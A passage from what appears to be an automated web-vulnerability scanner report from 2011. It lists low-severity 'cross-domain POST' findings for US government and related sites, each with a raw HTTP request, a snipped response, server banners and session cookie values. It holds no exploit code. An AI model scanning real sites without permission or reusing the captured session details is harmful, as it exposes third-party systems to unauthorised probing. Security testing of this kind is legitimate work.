PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:03'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<form action="default.cfm?securitysys=on&amp;FormID=199&amp;rand=579601" method="post" style="margin:0px;padding:0px;" name="Form0"><div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547"><table border="0" cellpadding="0" cellspacing="0" width="545" class="vertical" summary=""><tr><td height="1" style="width:120px" width="120"><img src="/ada/global/images/1p.gif" alt="" height="1" width="120" /></td></tr><tr><td colspan="2"></td></tr><tr><td colspan="2" class="cfHeaderTitle">There were errors with your input.</td></tr><tr><td><br/></td></tr><tr><td colspan="2" class="cfMessage" height="1"><div class="cfInstructionText"><REQUIREDHOLDER></div></td></tr><tr class="cfElementRow"><td class="cfMessage" align="left" valign="middle" style="" colspan="2"><div class="cfInstructionText"><input type='hidden' name='library_errormessage' value="%20%3Cli%3EPlease%20fill%20out%20the%20username%20field%2E%3C%2Fli%3E%3C%2Fli%3E%20"></div></td></tr><tr><td align="left" valign="top" colspan="2" class="cfPadLeft"><input class="cfInputButton" type="submit" value="Try Again" name="goback"/> <input type="hidden" name="old_choice" value="2" class="cfTransparent"><input type="hidden" name="bltextboxextradonotuse1_error" value="" class="cfTransparent" /><input type="hidden" name="u_name_error" value="yes" class="cfTransparent" /><input type="hidden" name="cftextboxextradonotuse_error" value="" class="cfTransparent" /><input type="hidden" name="usvuserid_adadefault_error" value="" class="cfTransparent" /><input type="hidden" name="old_choice_error" value="2" class="cfTransparent" /><input type="hidden" name="usvuserid_error" value="" class="cfTransparent" /><input type="hidden" name="submit_error" value="Continue" class="cfTransparent" /><input type="hidden" name="CHOICE" value="2" class="cfTransparent" /><input type="hidden" name="formname_error" value="Form0" class="cfTransparent" /><input type="hidden" name="choice_error" value="2" class="cfTransparent" /><i
...[SNIP]...

18. Cross-domain POST  previous  next
There are 22 instances of this issue:


18.1. http://johncarney.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://johncarney.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: johncarney.house.gov
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:38:34 +0000
ETag: "1304123914"
X-Generator: Drupal 7 (http://drupal.org)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 30 Apr 2011 00:38:35 GMT
Date: Sat, 30 Apr 2011 00:38:35 GMT
Connection: close
Content-Length: 49882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<!-- THOMAS SEARCH --><form action="http://thomas.loc.gov/cgi-bin/query" id="billsearch" method="post"><p>
...[SNIP]...

18.2. http://mi.gov/business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.gov
Path:   /business

Issue detail

The page contains a form which POSTs data to the domain onestop.michigan.gov. The form contains the following fields:

Request

GET /business HTTP/1.1
Host: mi.gov
Proxy-Connection: keep-alive
Referer: http://mi.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:32 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 35241

<!-- Vignette V6 Wed Apr 20 15:09:52 2011 -->

<!-- e-Michigan Portal - Process #8, Server www -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Conte
...[SNIP]...
</ul>

<form method="post" name="OneStopLogin" action="https://onestop.michigan.gov/pkmslogin.form" style="margin:-10px 0px 5px 0px" onsubmit="return preSubmit()" autocomplete="off">


<table width="190" cellpadding="0" cellspacing="0" border="0">
...[SNIP]...

18.3. http://milottery.state.mi.us/msl-og-detail.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://milottery.state.mi.us
Path:   /msl-og-detail.php

Issue detail

The page contains a form which POSTs data to the domain www.michigan.gov. The form contains the following fields:

Request

GET /msl-og-detail.php HTTP/1.1
Host: milottery.state.mi.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:23:20 GMT
Server: Apache/2.2.11 (When OES attacks!)
Content-Length: 30349
Connection: close
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="en-us">
<meta name="copyright" content="Copyright . 2010
...[SNIP]...
<td align='right' NOWRAP valign='bottom'>
<form method='post' action='http://www.michigan.gov/lottery/0,1607,7-110----S,00.html' id='form2' name='form2'><font face='arial,helvetica' size='2'>
...[SNIP]...

18.4. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olt.custhelp.com
Path:   /cgi-bin/olt.cfg/php/enduser/chat.php

Issue detail

The page contains a form which POSTs data to the domain ssbcvipmw01.rightnowtech.com. The form contains the following fields:

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php HTTP/1.1
Host: olt.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; rnw_enduser_login_start=LOGIN_START;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:24:37 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=378874 t=1304166277103307
RNT-Machine: 08
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17701

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script type="text/javascript">
var $ = getItem; function getItem(id)
{
return document.getEl
...[SNIP]...
<td class="form">
<form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;">
<table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" style="display: none">
...[SNIP]...

18.5. http://pa.gov/portal/server.pt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pa.gov
Path:   /portal/server.pt

Issue detail

The page contains a form which POSTs data to the domain www.portal.state.pa.us. The form contains the following fields:

Request

POST /portal/server.pt? HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http
Cache-Control: max-age=0
Origin: http://pa.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plloginoccured=false; REQUESTURLBEFORESSO=; ptLastLoginAuthSource=
Content-Length: 128

in_hi_space=Login&in_hi_spaceID=82&in_hi_control=Login&in_hi_dologin=true&in_tx_username=&in_pw_userpass=&in_se_authsource=cwopa

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=uc2nxa33mmh2xs55wfhh52by; path=/
Expires: 1304080785543
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304167185543
Content-Type: text/html; charset=utf-8
Content-Length: 34484

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
<tr>
                           <form name="BasicSearch" method="post" action="http://www.portal.state.pa.us/portal/server.pt" id="fedSearch">
                               <input type="hidden" name="in_hi_space" value="SearchResult" />
...[SNIP]...

18.6. http://pa.gov/portal/server.pt/community/pa_gov/2966  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pa.gov
Path:   /portal/server.pt/community/pa_gov/2966

Issue detail

The page contains a form which POSTs data to the domain www.portal.state.pa.us. The form contains the following fields:

Request

GET /portal/server.pt/community/pa_gov/2966 HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:49:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Expires: 1304030976822
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304117376822
Content-Type: text/html; charset=utf-8
Content-Length: 66908

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>PA.gov</title><script type="
...[SNIP]...
<tr>
                           <form name="BasicSearch" method="post" action="http://www.portal.state.pa.us/portal/server.pt" id="fedSearch">
                               <input type="hidden" name="in_hi_space" value="SearchResult" />
...[SNIP]...

18.7. http://www.buzgate.org/8.0/ny/fh.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzgate.org
Path:   /8.0/ny/fh.html

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /8.0/ny/fh.html HTTP/1.1
Host: www.buzgate.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:53 GMT
Server: Apache/2.2.17
Set-Cookie: BUZGateSessionInfo=69bc2eaab818394ecad836891008931a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: state=NY; expires=Sat, 30-Apr-2011 12:59:53 GMT; path=/
Set-Cookie: state_name=New+York; expires=Sat, 30-Apr-2011 12:59:53 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 27047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div align="center" style="padding-top:0px;">
       <form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post">
       <span style="font-weight: bold; font-family:Arial; font-size:12px; color:#006699;">
...[SNIP]...

18.8. http://www.buzgate.org/8.0/ny/fh.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzgate.org
Path:   /8.0/ny/fh.html

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /8.0/ny/fh.html HTTP/1.1
Host: www.buzgate.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:53 GMT
Server: Apache/2.2.17
Set-Cookie: BUZGateSessionInfo=69bc2eaab818394ecad836891008931a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: state=NY; expires=Sat, 30-Apr-2011 12:59:53 GMT; path=/
Set-Cookie: state_name=New+York; expires=Sat, 30-Apr-2011 12:59:53 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 27047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="searchSub">
       <form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post">
           <input type="text" name="ea" size="20" value="Submit Email" id="subscribeFont">
...[SNIP]...

18.9. http://www.doleta.gov/disability/new_dpn_grants.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doleta.gov
Path:   /disability/new_dpn_grants.cfm

Issue detail

The page contains a form which POSTs data to the domain service.govdelivery.com. The form contains the following fields:

Request

GET /disability/new_dpn_grants.cfm HTTP/1.1
Host: www.doleta.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 09:19:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<m
...[SNIP]...
<div id="subscribe">
<form action="https://service.govdelivery.com/service/multi_subscribe.html" method="post">
<p>
...[SNIP]...

18.10. http://www.nist.gov/search-results.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nist.gov
Path:   /search-results.cfm

Issue detail

The page contains a form which POSTs data to the domain service.govdelivery.com. The form contains the following fields:

Request

GET /search-results.cfm?q=xss.cx&btng=Search&num=10&sortType=L&scopeType=0&datefrom=&dateto= HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Referer: http://www.nist.gov/srd/onlinelist.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:13 GMT
Server: Apache
Set-Cookie: CFID=17042990;path=/
Set-Cookie: CFTOKEN=54636047;path=/
Last-Modified: Tue, 4 Jan 2011 22:32:06 GMT
NIST: g3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 18308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Conte
...[SNIP]...
<br />
<form method="post" action="https://service.govdelivery.com/service/multi_subscribe.html"><input value="http://www.nist.gov/" name="origin" type="hidden" />
...[SNIP]...

18.11. http://www.nist.gov/srd/onlinelist.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nist.gov
Path:   /srd/onlinelist.htm

Issue detail

The page contains a form which POSTs data to the domain service.govdelivery.com. The form contains the following fields:

Request

GET /srd/onlinelist.htm HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Referer: http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show?p_arg_names=context&p_arg_values=facts
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:05 GMT
Server: Apache
NIST: g3
Content-Type: text/html; charset=UTF-8
Content-Length: 13113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Con
...[SNIP]...
<div class="social20Wrapper">
                                               <form method="post" action="https://service.govdelivery.com/service/multi_subscribe.html">
                                                   <input value="http://www.nist.gov/" name="origin" type="hidden" />
...[SNIP]...

18.12. http://www.vsea.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:12:49 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a33741c30c60faca76c77b41e704af54; expires=Mon, 23 May 2011 01:46:09 GMT; path=/; domain=.vsea.org
Last-Modified: Fri, 29 Apr 2011 22:12:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Ver
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.13. http://www.vsea.org/editorial-lays-out-vermont%26%23039  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /editorial-lays-out-vermont%26%23039

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /editorial-lays-out-vermont%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.14. http://www.vsea.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:22:40 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.15. http://www.vsea.org/join-vsea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /join-vsea

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /join-vsea HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:10 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:11 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 34231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.16. http://www.vsea.org/join-your-union  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /join-your-union

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /join-your-union HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-vsea
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:24 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:24 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.17. http://www.vsea.org/maine-study-finds-state%26%23039  previous  next

Summary

Severity:   Information
